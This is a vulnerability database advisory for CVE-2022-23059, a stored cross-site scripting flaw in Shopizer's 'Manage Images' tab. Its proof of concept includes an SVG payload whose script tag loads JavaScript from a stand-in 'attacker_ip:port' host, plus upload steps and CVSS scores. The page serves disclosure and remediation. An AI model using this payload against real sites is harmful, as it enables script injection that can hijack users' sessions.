Vulnerabilities
Projects
Vulnerability Disclosure
About Us
Contact Us
Mend.io Vulnerability Database
What is a CVE vulnerability ID? 
What is a WS vulnerability ID?
What is an MSC vulnerability ID?
New vulnerability? Tell us about it!
What is a WS vulnerability ID?
What is an MSC vulnerability ID?
We found results for “”
CVE-2022-23059
Date: March 29, 2022
Overview
A Stored Cross Site Scripting (XSS) vulnerability exists in Shopizer versions v2.0.2 through v2.17.0 via the “Manage Images” tab, which allows an attacker to upload a SVG file containing malicious JavaScript code.Details
A Stored Cross Site Scripting via “Manage Images” tabPoC Details
1. Access “/admin/login.html” URL and login using the credentials “testuser:password”.2. Navigate to the “Manage Images” tab from “Manage content” and upload a SVG file with this code: <svg><script type=”text/javascript” xlink:href=”http://attacker_ip:port/xss.js”></script></svg>
3. Run a simple HTTP server with content in “xss.js” file as “alert(“XSS”);”.
4. The uploaded SVG file can be found under “Manage images” and to access it “open image in new tab”.
5. An external JS file has been loaded into the application and triggered an XSS.
Affected Environments
Shopizer versions v2.0.2 through v2.17.0Prevention
Upgrade to Shopizer version 3.0.0Language: Java
Good to know:
| Base Score: |
|
|---|---|
| Attack Vector (AV): | Network |
| Attack Complexity (AC): | Low |
| Privileges Required (PR): | High |
| User Interaction (UI): | Required |
| Scope (S): | Changed |
| Confidentiality (C): | Low |
| Integrity (I): | Low |
| Availability (A): | None |
| Base Score: |
|
|---|---|
| Access Vector (AV): | Network |
| Access Complexity (AC): | Medium |
| Authentication (AU): | Single |
| Confidentiality (C): | None |
| Integrity (I): | Partial |
| Availability (A): | None |
| Additional information: |